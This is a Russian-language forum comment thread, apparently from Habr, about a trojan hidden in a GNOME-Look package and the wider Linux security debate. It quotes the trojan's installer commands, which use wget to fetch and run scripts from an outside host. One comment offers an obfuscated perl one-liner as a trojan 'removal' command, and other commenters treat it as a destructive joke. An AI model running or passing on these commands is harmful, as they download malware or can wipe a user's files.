Pull to refresh

Comments 129

Вчера тоже наткнулся на эту новость. Ну чтож товарищи с почином,
вот и начала проявляться обратная сторона популярности linux.

P.S. Уверен что сообщество сможет противостоять подобного рода
угрозам, по крайне мере существующие сейчас механизмы на это способны,
сложнее будет когда появятся большее число программ.
Куда уж больше программ? их и так многие тысячи.
UFO landed and left these words here
Троян — не совсем вирус(даже скорее совсем не вирус) он безпользователя размножаться не сможет.
А перед пользователем беззащитны вообще все.

IMHO: Антивирусы были обруганы за дело
Скорее, имелись в виду, политики, а не программы.

Например, основная политика: устанавливать программы (включая темы, скринсейверы и прочее) только через проверенный репозиторий.

Доверять же архиву с непонятным содержимым не стоит, даже если он выложен на сайте автора.
UFO landed and left these words here
100% поскольку есть официальные сайты и официальные репозитарии!
С ними работает толпа народу, и в данном случае вредоносный функционал намного легче найти.

А в случае, если качешь какой-то левый скрипт/програмку — сам виноват.

Качать и ставить софт только из подписанных репозиториев, желательно официальных. Используйте этот механизм и ваши волосы будут кучерявыми.
Ну так это файлопомойка по сути, туда вообще можно rm -rf / выложить. Качать оттуда бинарники — это самоубийство какое-то.
Рано бить в набат, а вернее уже поздно, эти ваши «трояны» уже как сто лет существуют и хостеры не по наслышке знают о них, ведя неравные бои в «абсолютно незащищенной» (резидентным антивирем) системе ;)

Кстати антивирь не панацея вовсе, если пользователь запустил от рута что-то вроде:
cd /usr/bin/
wget 05748.t35.com/Bots/index.php
wget 05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash

какую из набора команд нужно запрещать?.. Похожим образом, например, устанавливается Flash ( habrahabr.ru/blogs/ubuntu/76460/ ) или Swiftfox ( getswiftfox.com/installer.htm )
Я бы даже сказал что ничего нелегального в этом способе нет вовсе, дело только в контексте — пользователь получил не то, что он хотел.
Благо исходные коды открыты, а тот кто действительно заинтересован в безопасности, будет просто уделять больше внимания источникам и хотя бы бегло просматривать код. Другой вопрос сколько таких вредных функций в закрытых программах, без исходных кодов, о которых можно только догадываться, тут уж никак не проверишь.
Ну да… бегло пробежался по исходникам KDE 4 перед обновлением))))
например я не использую не одну закрытую программу, думаю мало кто из линуксоидов делает иначе
UFO landed and left these words here
нет, я не изучаю исходники.
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы
UFO landed and left these words here
Не хотелось бы цепляться к словам, но вряд-ли у Вас софт ТОЛЬКО от этих компаний.
Да и наличие незакрытых годами уязвимостей — гораздо опаснее.
UFO landed and left these words here
почему не дает?
Продукты MS закрытые, мы не знаем что там можем только предпологать.
Тот же Eclipse открытый, уверен есть люди которые изучают его код, в случаенаходения вот таких вот вредоносных строчек будут исправлять, писать об этом, то есть мы бкдем знать об этом
UFO landed and left these words here
то что были найдены вредоносные действия в каталоге GNOME-Look, о том и говорит что открытые исходники изучаются
UFO landed and left these words here
ну все таки находят.а закрытых проектах так и не найдут, пока не будет использовано 1000 уязвимостей
UFO landed and left these words here
Mrcid хочет сказать, что при прочих равных условиях шанс, что кто-то обнаружит «вредоносность» OpenSource гораздо выше.

Хотя я сам всегда думаю — неужели кто-то проверяет весь код?
UFO landed and left these words here
Да, интересно, и кто это обнаружит? Mrcid? :D

Я вас много знакомых, ведущих аудит кода? Не думаю, что найдется хотя бы один. Всесторонний анализ кода это достаточно сложный и трудоемкий процесс. Поэтому делает это автор ПО да еще может пару человек которых к этому обязывает служебное положение.

aktuba абсолютно прав. В OpenSource большой плюс в том, что я могу взять исходники программы и в случае надобности изменить их/дописать свое расширение. Но по ходу понимают это только те, кто такие модификации проводил ;)
Простите, но по-моему у вас с aktuba какая-то извращенная логика.
Не нужно миллионов глаз для аудита абсолютно всех исходников абсолютно всех открытых проектов, которые существуют.
Угроза от вируса в открытом проекте пропорциональна количеству пользователей этого проекта.
А количеству пользователей пропорционально внимание программистов к исходникам.

Согласитесь, вероятность выживания вредоносного кода в продуктах типа Apache HTTP Server уж никак не выше, чем в закрытых проектах аналогичного масштаба.

А то нашли бекдор в программе с одним автором и тремя с половиной пользователями подняли шумиху…
Я думаю, что аудит кода- это преррогатива мейнтейнеров дистрибутива, равно как и допиливание софта, который в него входит. Автору то зачем его проводить? Он его сто раз видел, пока писал и отлаживал :) Хотя было бы очень круто, если бы существовало сообщество, занимающееся исключительно проверкой кода на отсутствие закладок, уязвимостей и т.д. и т.п. Только вот вряд-ли оно будет- работа нудная и кропотливая, а необходимые специалисты слишком высокооплачиваемы.
поверьте читают исходники.
конечно исходники исходникам рознь, что то более популярное и подвергается большему аудиту а что то не такому, но при прочих равных шанс припрятать бяку и остаться незамеченным в открытых сырцах на порядок меньший.
Разработчикам descent пришлось для написания свого плагина в том числе и изучать код eclipse. Мне пришлось для написания патча изучать исходники одного свободного проекта. не пытайтесь утверждать, то исходники не читает *никто*. Это не так.
UFO landed and left these words here
По крайней мере это утверждал тов. ellinium. :)
UFO landed and left these words here
Да-да, я надеюсь что кто-нибудь голосует на выборах, разобравшись в программах кандидатов. Перестраиваясь вправо не глядя в зеркало, я надеюсь что кто-нибудь сзади в этот момент напряженно смотрит на дорогу. Покупая молоко в магазине, я надеюсь что кто-нибудь до меня посмотрел на срок годности — ведь в магазине тысячи покупателей, кто-то же смотрит на эти маленькие черные цифры. В общем, я всегда надеюсь на то, что есть кто-то другой, кто позаботится о моей безопасности.
ну не даёт вам — ну не используйте.
мне даёт и из двух одинаковых продуктов я выберу открытое решение. Только если закрытое намного не выше по функционалу.

а так — после нескольких лет на линуксе и очень многим разборкам с виндой у друзей — имхо, открытый софт если пишется адекватными людьми (а таковые стоят у истоков почти всех крупных проектов сейчас), то он _стабильнее_ чем закрытые аналоги. Закрытый софт работает до поры до времени, пока что то не «упс». Потом его юзер выключает и включает и работает дальше. А при таком «упсе» у открытого софта очень скоро будет армия подписавшихся под багрепортом.

У того же MS Office — я даже не представляю куда отправлять багрепорт и что там сказать на вопрос «какой софт установлен?». Скажу — ну антивирус АБВГД. А мне — ну так это проблема антивирусаа…
UFO landed and left these words here
> Видимо и не пытались? =) В меню специальный пункт есть — «Напишите нам» =)))
> И я уверен, что отреагируют гораздо быстрее, чем разработчики СПО-софта. Был опыт обращения к
> последним.

я очень много общаюсь с разработчиками «СПО-софта» (это что за термин такой вообще?) и вообще сам им являюсь. И никто, вообще никто, ни разу из моих друзей и знакомых не пытался отправить багрепорт ни в одну закрытую программу вообще. Даже люди вроде бы как «подкованные». При любых глюках наезды идут либо на ось, либо на «антивирус» (популярно нынче) либо на ещё кого-нибудь. А учитывая что перезагрузки оси ошибка _действительно_ может пройти, это вообще выходит из-под контроля. Я уж молчу о том, что если платить деньги за весь софт, то это у любого продвинутого пользователя встанет в несколько тысяч долларов ежегодно. А учитывая что даже директора крупных компаний вообще не брезгуют ставить пиратский софт — вот сколько угодно мне говорите, мол, «я всё покупаю» — ну нереально в такое поверить в России.

и если и не знаю секрет ли для вас, но для нас нет — как бы там ни было более половины багрепортов в открытый софт решаются самим коммьюнити, часто — самим репортером. С закрытым софтом такое впринципе невозможно.

на следующее ваше сообщение отвечать не буду (а потому не утруждайте себя отвечать и на моё). Ибо холиварить глупо =). Ещё один человек рассуждающий, а не выкладывающий факты. Одна только фраза «СПО-софт» уже сказала о вас как о человеке вообще слабо представляющем натуральные плюсы и минусы софта с открытым кодом (причём, не всегда при этом бесплатного) =)
UFO landed and left these words here
> Вы же сами написали, что OpenSource не всегда бесплатен. С чего вы решили, что проприеритарный софт всегда платный? o_O

среди открытого софта небесплатных — единицы, равно как и наоборот.
О да, а как надеялись пользователи купленной ms windows в локалке, что их conficker жрать не будет, у-у-у… …пожалуй даже больше, чем пользователи опять же купленной MacOS сохранить свой домашний каталог в целости при обновлении.
> Под покупным софтом, разумеется, я подразумеваю софт от крупных компаний, таких как MS, Oracle, Adobe и т.д.

Какое отвратительное лицемерие. Устанавливая софт через synaptics я тоже уверен, что он не содержит встроенной гадости. Что это доказывает? Зачем вообще использовать подмену понятий в спорах с другими людьми?

Отрубание рук топором безопасно. Под отрубанием рук топором, разумеется, я подразумеваю поход в зоопарк.
UFO landed and left these words here
UFO landed and left these words here
Из каких умозаключений это следует?
>нет, я не изучаю исходники.
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы


Ну вот смотрите, лежат на сайте 2 пакета: .tar.gz и .deb. Этот самый «кто нибудь», который любит почитать перед сном исходники программ, исследует tar.gz и ничего не находит. Вы ставите себе deb и ловите трояна. Ибо то, что deb лежит рядом с tar.gz и имеет то же имя, ещё не говорит о том, что он был скомпилён из этих исходников. Никто не мешает автору засунуть вредоносный код непосредственно перед сборкой deb-а.
Если собираете руками — тогда да, ещё есть смысл в изучении исходников, иначе — болт.
UFO landed and left these words here
Тут как в анекдоте про евреев только наоборот, когда они учились пить водку и один подумал что если он принесет воду, а не водку никто не заметит. В итоге оказался полный чан воды. Каждый кто юзает опенсорс софт думает что там все чистенько и супер потому что хоть мне и некогда но наверняка сотни людей посмотрят что же там. Остается загадкой сколько из этих сотен думают так же и посмотрит ли кто-нить вообще этот код в принципе.
Спрос рождает предложение.
Я более чем уверен, что если трояны в линуксе станут серьезной проблемой, это станет стимулом и рекламой для хорошо зарекомендовавших себя сборщиков дистрибутивов. Или людей, которые их обозревают, эдаких аудиторов.

А вообще, как уже было сказано выше — берите из проверенного источника и не морочьте себе голову.
для этого эти самые трояны должны для начала хотя бы появиться…
Mecid, а из какого каталога запускать удаление? А то в параметрах указаны файлы с относительными путями.
запускайте из домашнего каталога
Минусаторам: это не шутка. :) Вот это сработает из любого каталога:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh ~/index.php ~/run.bash && sudo dpkg -r app5552
Мое ИМХО — это говорит не о том опасно на Linux или Windows нет, это говорит о том, что Linux стал популярным, что троянщики стали уделять время на написания вредоносного ПО на Linux.
UFO landed and left these words here
Легко, лежит, бинарником незапущенным на винте и не шевелится!
Кстати, после закрывания с кайпа, в памяти остаётся процесс. хз чего он делает, но, после завершения использования, не забывайте веполнять killall -9 skype.
Проверил, ничего не остается. skype 2.1 система arch32
Кто может с уверенностью сказать что он сейчас делает на вашем компьютере?
ничего. ибо не запущен
Я устанавливаю skype только когда кто-нибудь просит поговорить по нему и потом немедленно сношу.

Меня ещё можно вылечить? :)
если только пересадить на счёты с костяшками))))
шучу, никаких претензий)))
Говорят, еще надо windows переставлять после де-инсталяции. А то мало ли…
Под windows skype вообще не было никогда. А Gentoo учитывает все файлы, оставшиеся от установки, а при работе запись возможна только в домашний каталог.
А что с ним не так? Судя по новостям, дело было в серверах.
интересно, а как в настоящее время проверяют наличие/отсутствие вредоносного кода сборщики дистрибутивов? ведь много пакетов поддерживается сообществом…
Любая ОС уязвима к троянам. Точка. Если уж пользователь настолько доверчив, что запускает недоверенный софт от рута — что ж, флаг в руки, тут никакой линукс не спасёт.

Наблюдение из жизни простое — если руки прямые, всё хорошо в любой ОС (у меня вирусов на моём компе, пока я ещё на винде сидел, не было многие годы, без антивируса). А если руки кривые — проблемы будут везде, как бы не старались разработчики.
UFO landed and left these words here
>А у Windows огромный опыт.
Уверен что даже это не поможет от аналогичного батника (а уж повершелл — сказка). Причем не заметит ни один из имеющихся антивирусов, так как по сути в нем нет ничего необычного.
UFO landed and left these words here
>Ну, давайте не сравнивать .bat-файл и пакет установки.
Что в винде отменили инсталляторы, хахаха. Да там обычно даже и не посмотришь без такой то матери, что тебе инсталлятор делает в системе и спросит он у тебя администраторские права ведь дашь. Ну не ты, так другие 9 из 10.

>Плюс, если батник требует вмешательства в систему, то в Windows Vista/7 его нужно запускать с правами администратора
Ты вообще смотрел, что там на гномолуке было? Не надо там никаких администраторских прав и точно также и в винде. Учитывая количество софта распространяющегося под винду впарить подобный скрипт проще простого и будешь как миленький ддосить, что тебе скажут.
UFO landed and left these words here
>Я повторюсь — речь идет о излишнем изначальном доверии пользователей и мейнтейнеров
Да нет там никаких ментейнеров на этом гномолуке, весь контент юзерский и модерируется вот в таких вот случаях, ну или если какой олух «хуй» напишет в названии. А в современных популярных дистрибутивах ментейнеры люди исключительно доверенные. Если вы не доверяете им, то вам также не стоит доверять тому, кто подготавливает файлы для windows update, ведь почему бы ради того чтобы поиметь ботнет в 90% всех компов не втереться в доверие к M$? :)

>Если Вы уверены, что в Windows из коробки есть инструменты для запуска аналогичных по функциональности .bash-скриптам скриптов, то глубоко ошибаетесь.
Уж скачать файл через telnet и запустить ping точно осилит. А powershell еще и не такое умеет, он же вроде теперь по умолчанию?
> Уж скачать файл через telnet

Не знаю, как в WinVista и Win7, но в серверных версиях (Win2008/2008R2) по умолчанию из коробки нет не то, что telnet-сервера, но даже и telnet-клиента. Его приходится ставить отдельно, как дополнительную фичу.
Скажите еще там сокеты не проинсталированны :)
Вообще-то bash для скриптинга — весьма неудобная штука. В винде по умолчанию есть Jscript/VBscript — можно делать аналогичные, но более понятные скрипты.
Уже приведенный здесь PowerShell хоть и является весьма гибким средством, но все же не может быть использован для подобного рода атак из-за дефолтных настроек безопасности для скриптов (попробуйте скачать ps1 файл и запустить его)

help about_Execution_Policies

Дефолтная политика: Restricted, позволяющая выполнять команды, но не позволяющая выполнять скрипты.
>>При грамотном использовании Windows абсолютно безопасна.
Такие же глупости как то, что Linux абсолютно безопасна. Моего хорошего друга, грамотного виндового сисадмина, сидящего за корпоративным файрволлом, секьюрити-хуюрити, очень уверенно пробили в существующую на тот момент уязвимость в firefox, с помощью которой (при живом касперском с актуальными базами) он сразу подхватил еще тогда неизвестную модификацию Pinch, которая в течение 10 минут спиздила 300 баксов с e-gold.
Он конечно нашел потом вирь (с помощью новой беты Каспера, кроме нее никто вообще не различал его) и отправил его в Лабораторию, и через 2 часа он уже был в базах, но что толку. 300 баксов уже улетели.

Так что не надо быть самоуверенными, господа.
UFO landed and left these words here
Нет, тут история про дырявый СОФТ. Ни Chrome ни все равно что еще — не идеальны. Абсолютно безопасна только отключенная от интернета система, в которую не втыкают внешних носителей.

FYI: Firefox тоже не исполнил Pinch из под админских прав. Их и не надо было чтобы провести операции над кукисами в запущенном браузере.
Согласен, но лично знаю несколько человек, у которых после установки Gentoo *внезапно* выпрямились руки. Один из них вернулся на Висту и руки у него опять стали кривыми.

Достаточная для появления троянов кривизна рук под виндой немного меньше.
Нонсенс — установить Gentoo с каким-либо осязаемым радиусом кривизны рук.
У меня перед полной чисткой HDD и установкой Gentoo было две ОС — WinXP и Ubuntu. На первой — сотня вирусов, вторая — сломана. :) Так что вы не правы.

Хотя можно предположить, что сам факт скачивания Gentoo Minimal Install CD немедленно выпрямляет руки. :D
Да, кстати, сейчас у меня тоже стоит WinXP, но ни вирусов ни антивирусов на ней нет.
а про отсутствие вирусов тогда откуда такая уверенность?
Уверенности нет, но всё работает и лишних процессов не видно.
у меня СПИДа нет — я же живу и нос не отваливается)))))
Вирусы могут быть:
1. Произведением шутников. Такие бы дали о себе знать.
2. Разрушительными. Аналогично.
3. Троянами для сбора информации. Боюсь, WinXP у меня только для игрушек и информацию там особо не соберёшь. Раздел с Gentoo даже для чтения не доступен. Ибо ext4.

Если они всё-таки есть, то это только подтверждает мой заминусованный тезис:
> Достаточная для появления троянов кривизна рук под виндой немного меньше.
А то что ты можешь быть частичкой ботнета, ты не подумал?
Учитывая, что последний раз в винду я загружался два месяца назад и нахожусь за NAT, вряд ли.
Что сложного в этом? Сидишь, читаешь, делаешь. Если есть какой-либо опыт, пусть даже не большой, работы с линуксами, то генту поставить будет не сложно. Только долго. У меня потом глаза болели от этого…
Такой доверчивости неопытных пользователей очень способствуют заявления типа «windows — решето, а вот в linux вирусов не бывает, все пользователи linux желают вам добра».
UFO landed and left these words here
UFO landed and left these words here
И таких все больше и больше.

Работаю в тпх. Недавно звонил клиент поставивший меня в секундный ступор. В ходе непродолжительно беседы стало понятно, что на клиенте проблемы с DNS кэше провайдера. Остается в этом точно убедиться, а главное доказать.

-Отлично, теперь отредактируем файл hosts. Открываем диск С, папка Windows.
-У меня Linux.

У меня ступор с мылью «ммляяять… человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!». Но нужно уже начинать привыкать, с каждым годом леммингов на данной оси станет все больше.
UFO landed and left these words here
alekciy, это я минусанул
сам под линуксом с 98го, работал у крупнейшего провайдера региона в нише Linux-серверов, сейчас своя фирма по интеграции Open Source и свой портал по Open Source с 2000 посетителей в сутки, но я в корне не согласен:

>>человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!

возьмём эникейщика который мелкие фирмы обслуживает. Он больше меня знает в 10000 раз 1С, эксель (видимо из-за скудости моего ума для меня одна из самых страшных программ:), он знает миллион программ под Windows и тд… про ДНС он знает то, что DNS «должен быть — без него интернет не работает». Максимум он знает пинг, трейс. Но даже активные линуксойды моего сайта не знают что такое NSLOOKUP, WHOIS, не знают чем различаются TCP от IP, про семиуровневую модель OSI говорить нечего! но это ярые линуксойды, программеры и даже есть реальные учёные (не просто преподы). Мне самому временами дико, что этим людям абсолютно неизвестно как работает почтовый сервер, что такое SMTP и POP3. IMAP и тд. Но потом понимаешь, что они абсолютно не обязаны понимать как работает SMTP-сервер. И тому же виндовому эникейщику не совсем не обязательно знать, что у DNS провайдера существует кэш. А ты про обычного смертного говоришь…

P.S.: кстати этот клиент «линуксойд» может быть обычным сотрудником, которому на рабочую машину поставили Ubuntu и что он смог — это понять, что виндовза нет и у него некий линукс, о чем надо сразу предупреждать.
Правильно. Каждый должен знать в рамках сферы своей компетенции. Но, имхо, если человек занимается администрированием/обслуживаем сайта, такие вещи он знать просто обязан.

Ведь мы ждем того, что машинист должен уметь водить локомотив, летчик управлять самолетом, а водитель автомобилем? Я не говорю о том, что бы они все знали устройство управляемого ими агрегата, я говорю о знаниях касающихся именно процесса управления.
ну неееет…
обслуживание/администрирование сайта не то же что администрирование сервера где он хостится, давайте тогда заставим тех же админов сайтов знать на зубок RIP, BGP, OSPF? а еще лучше заставим их сдать экзамен на Cisco Certified Internetwork Expert — CCIE
у каждого своя работа.
В самом страшном случае можно clamAV приспособить для проверки скачанных из непроверенных источников пакетов.
Кстати, численно пользователей Линукса очень даже не мало, для ботнета более, чем достаточно.
ну не поможет вам clamav от
rm -rf / запущенного из под рута…
Мда.
Во-первых, при чём тут «linux стал небезопасным»? rm -rf / от рута как работал 10 лет назад, так и работает. Ничего не изменилось.
Во-вторых, а почему никто на этом ресурсе не сказал: ««gnome-look.org» раздолбаи», а сразу пошли в атаку на linux?
В-третьих, а сколько человек реально скачали этот код, до того как он был выявлен? Может быть не так много и сообщество сработало чётко, да и гномлукорговцы показали себя совсем не раздолбаями?
В-четвёртых: кто и каким образом выявил этот самый вредоносный код «в системе без традиций и средств защиты», да ещё в условиях «когда все надеются на других»?
В-пятых: при чём тут рост популярности linux? Почему уверены, что писал не фанат nix-ов? Спамеры вон kmail освоили и полюбили. Но кто это: спамер ставший никсоидом или никсоид, ставший спамером — я не знаю, хоть и подозреваю первое из-за использования явно гуёвой проги для нетребующего гуя дела.
Что панику-то разводить? Новость преподносится так, как будто под Линукс портировали конфикер. Кто не поленился зайти на сайт этого пресловутого gnome-look, тот понял что это файлопомойка в стиле веб 2.0. Любой дятел может там выложить все что угодно. И сколько там еще таких троянов, не знает никто.

Так что обычные пользователи линукса, пока ставят софт из респозиториев стабильных версий своих дистрибутивов могут спать спокойно.
Для удаления трояна требуется ввести команду:
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Боян.

Кто хочет поэкспериментировать — создайте себе специально для экспериментов пользователя:
# useradd -m test
# su test
$ cat «test... test... test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Мне кажется, надо так:

# mkdir /tmp/bugoga
# chroot /tmp/bugoga
# echo 'test... test... test...' | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


И хотя программа, в принципе, может выбраться из-под chroot, будучи запущенной из-под рута (насколько мне известно), всё равно от шуток типа «rm -rf --no-preserve-root /» в коде программ это защитит :).

P.S. Да, я знаю, что perl так не запустится :).
Или просто запускать в песочнице с запретом на запись.
virtualbox с системой «для опытов» так вообще позволяет отстреливать себе ноги без последствий
у вас ошибка
не cat «test… test… test...» а
echo «test… test… test...» :)
ты вообще понимаешь, что подобными «шутками» вы настроили против линукса не одну тысячу человек? и это «ярые бАрцы за распространение СПО»…
UFO landed and left these words here
Во-первых, это не шутка, троян действительно удалится (хотя там пишут, что в коде ошибка, я не знаю).

Во-вторых, я всего лишь в ироничной форме отметил тот факт, что автор топика предлагает без особых разъяснений просто выполнить некий код для удаления трояна, что тоже является потенциально опасным действием. Так-то!
Я обычно перед такими командами выполняю mv /bin/rm /bin/rm.old
Потому что все ставить надо с официальных репозиториев. Или из _просмотренных_ исходников.
И не надо гнать на линукс.
SELinux/AppArmor решает. вопрос много ли осилило правильно настроить сиё на рабочей станции, многие и на серверах забивают.
Операция удаления файлов, написанных в новостях, выполненная от рута, также является потенциально опасной.

Для начала можно просто проверить, есть ли эти файлы.

$ find /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh ~/index.php ~/run.bash

нет у юзеров права на запись в /usr/bin и /etc
либо используется sudo без пароля для установки вредоносного кода
Во-первых, никто не поделится информацией, сколько времени прошло между выкладыванием заражённого пакета и обнаружением собственно факта его заражённости? Известен случай, когда в репозитории был выложен — проверки ради — код чего-то там с вредоносной вставкой. Практика тогда показала, что код прожил ровно 20 минут, после чего был обнаружен и активисты подняли хай на весь интернет. Здесь, вполне очевидно, то же самое и посему мне интересно — каков интервал между диверсией и разоблачением.

Во-вторых, в комментариях нет мнения представителей GNOME в любом их виде, каковых, я уверен, есть на Хабре. Не хотят они нам ничего сообщить по существу?

В-третьих… С одной стороны, пользователь сам должен скачать и установить пакет — никаким другим способом этот зловред не распространяется. С другой стороны, каталог GNOME-Look всё же — не варезная помойка неизвестного происхождения и имеет (или уже надо говорить «имел»?) репутацию среди гномоводоведов, каковые и в самом деле предпочтут качать красивости оттуда, нежели откуда-то ещё. Возникает вопрос — если зловред попал на такой солидный портал, то какова гарантия, что этот зловред или его единокровные собратья не попадут или уже не попали в официальные репозитории? К примеру, в те самые официальные репозитории, из которых подкармливается обновлениями моя Мандрива…

Видимо, просвещённому сообществу пришла пора несколько пересмотреть свои взгляды на linux…
>нет мнения представителей GNOME
А при чем тут GNOME вообще, этот сайт никакого отношения к GNOME Foundation и его участникам отношения не имеет, M$ же вам не отчитывается за каждый вирус работающей в их среде, коих сотни тысяч :) Можете рассматривать этот ресурс как файлопомойку с аттрибутикой GNOME, которую наполняют юзеры. Насколько пользователь доверяет выложенному там контенту только говорит о его уровне развития.

>Возникает вопрос — если зловред попал на такой солидный портал, то какова гарантия, что этот зловред или его единокровные собратья не попадут или уже не попали в официальные репозитории?

Совершенно левый пакет автор которого неизвестен, не имеющий официальной странички, ни ссылки на скачку исходников (да, иконки и темы тоже распространяются с «исходниками»), а только бинарный deb уже вызывает подозрение. О его попадании в дистрибутивы даже можно и не говорить.
Здравствуйте, All!
Я — Албанский вирус, но в связи с очень плохим развитием технологии в моей стране, я, к сожалению, не могу причинить вред вашему компьютеру. Пажалуйста, будте так любезны, сотрите один из важных файлов с вашего компьютера самостоятельно и перешлите меня другим.
Зарание благодарен за понимание и сотрудничество.
UFO landed and left these words here
Sign up to leave a comment.

Articles